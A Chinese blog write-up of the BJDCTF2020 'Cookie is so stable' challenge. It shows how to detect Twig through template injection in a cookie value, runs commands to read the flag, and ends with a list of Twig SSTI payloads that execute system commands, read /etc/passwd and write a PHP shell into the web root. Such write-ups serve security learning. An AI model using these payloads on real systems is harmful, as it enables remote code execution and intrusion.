[BJDCTF2020]Cookie is so stable

[BJDCTF2020]Cookie is so stable

aELO8GZkmAtjQzElnjow5HIdWt4At37EhKbTM38FwsI

打开环境,在页面源代码中发现提示查看cookies

s9V61p_jVrehuMJ8ew6Cndw7hF5DCnu4IM3P4VRS0is

cookie里的user的值会显示到页面中

vmJdHDT4gJBWwdK21p64uxMUG_dQRUMuoBZyha9I24c

在user处尝试注入

{{7*'7'}} 回显7777777 ==> Jinja2

{{7*'7'}} 回显49 ==> Twig

PXAZEADBeB76CW27fhQae5sDOvatJLCMNe2EIa-ewME

回显49所以是Twig

payload:

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

GliK2dfPHhNd65byJ7PeOU-BTGzHHG4vKAnHzOwyxWA

获取flag

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

v_fQHYltR0cIc2ILkiYR_4vPmeDn4g-MW_D_NOIASNw

这里附上Twig常用的注入payload:

{{'/etc/passwd'|file_excerpt(1,30)}}
{{app.request.files.get(1).__construct('/etc/passwd','')}}
{{app.request.files.get(1).openFile.fread(99)}}
{{_self.env.registerUndefinedFilterCallback("exec")}}
{{_self.env.getFilter("whoami")}}
{{_self.env.enableDebug()}}{{_self.env.isDebug()}}
{{["id"]|map("system")|join(",")
{{{"<?php phpinfo();":"/var/www/html/shell.php"}|map("file_put_contents")}}
{{["id",0]|sort("system")|join(",")}}
{{["id"]|filter("system")|join(",")}}
{{[0,0]|reduce("system","id")|join(",")}}
{{['cat /etc/passwd']|filter('system')}}

再附上SSTI漏洞的基础知识:

https://www.cnblogs.com/bmjoker/p/13508538.html

posted on 2024-02-13 21:21  跳河离去的鱼  阅读(81)  评论(0编辑  收藏  举报